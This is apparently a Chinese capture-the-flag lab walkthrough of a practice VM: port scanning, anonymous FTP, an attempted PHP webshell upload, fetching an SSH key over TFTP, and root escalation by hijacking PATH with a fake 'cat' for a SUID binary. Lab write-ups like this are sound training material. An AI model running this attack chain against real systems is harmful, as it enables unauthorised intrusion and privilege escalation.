每日一学

请添加图片描述
NO.7 你了解哪些中间件

Apache
Nginx
IIS
Tomcat
JBoss
Weblogic

信息收集

先来扫网段

nmap -sP 192.168.2.0/24

在这里插入图片描述
继续收集端口，服务等信息

nmap -sC -sV -p- 192.168.2.23

开了FTP,SSH,HTTP，这里的FTP可以直接空密码登录，里面有一个空的index.html
在这里插入图片描述
打开网站一看，说id_rsa泄露了，这可得扫一波，并且名字叫alexia

gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.23 -x txt,html,zip,php,rsa

扫完啥都没有
在这里插入图片描述
那就应该是在ftp服务器上面了，直接Anonymous 空密码登录一波

ftp 192.168.2.23

有一个.wbe目录
在这里插入图片描述
里面有一个index.html，下载下来看看

get index.html

我发现这个内容与我们看到的内容一致，那么这个目录就是网站的根目录了
在这里插入图片描述
那么我们可以直接上传一个一句话木马到这个目录

put 2.php

在这里插入图片描述
就当我以为要拿到webshell的时候，我发现不解析PHP，而是直接下载

扫目录扫不到，FTP上传PHP不解析，我也很异或~至此 FTP与Web端能够挖掘的东西都榨干了，可能是有一些端口没有扫到，扫一下UDP
先扫100个，因为速度实在是太慢
在这里插入图片描述

nmap -p1-100 -sU -sT 192.168.2.23

扫到tftp和dhcpc
在这里插入图片描述

直接连接tftp

tftp 192.168.2.23

由于网页上的暗示，这里直接get id_rsa
在这里插入图片描述
接下来直接登录alexia用户

chmod 600 id_rsa
ssh alexia@192.168.2.23 -i id_rsa

登录成功
在这里插入图片描述
看一下sudo和suid

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

发现/opt/showMetheKey
在这里插入图片描述
直接运行，拿到一个私钥，这个私钥似乎是我们自己的

/opt/showMetheKey

在这里插入图片描述

把这个文件下载到本地反编译一下

python3 -m http.server
wget http://192.168.2.23:8000/showMetheKey
radare2 showMetheKey
aaa
afl
smain
pdf

我发现这个cat使用的是环境变量，而不是绝对路径，那么我们可以伪造一个cat
在这里插入图片描述

echo "/bin/sh" >cat
chmod +x cat
export PATH=/home/alexia/
/opt/showMetheKey
export PATH=/usr/bin/:$PATH

成功拿到root权限
在这里插入图片描述
/root目录下只有一个note.txt，他说他不记得放到哪里了

find / -name  "root.txt"

找到root.txt
在这里插入图片描述

总结：拿到webshell的过程还是小曲折的，当我看到index.html的时候都笑出声了，可是没想到居然不解析，局面一下陷入了僵局，过了半天，才想起来UDP扫一扫，这才发现tftp拿到私钥，拿到私钥之后就是简单的suid提权了，覆盖一下环境变量就好，总体还是偏易的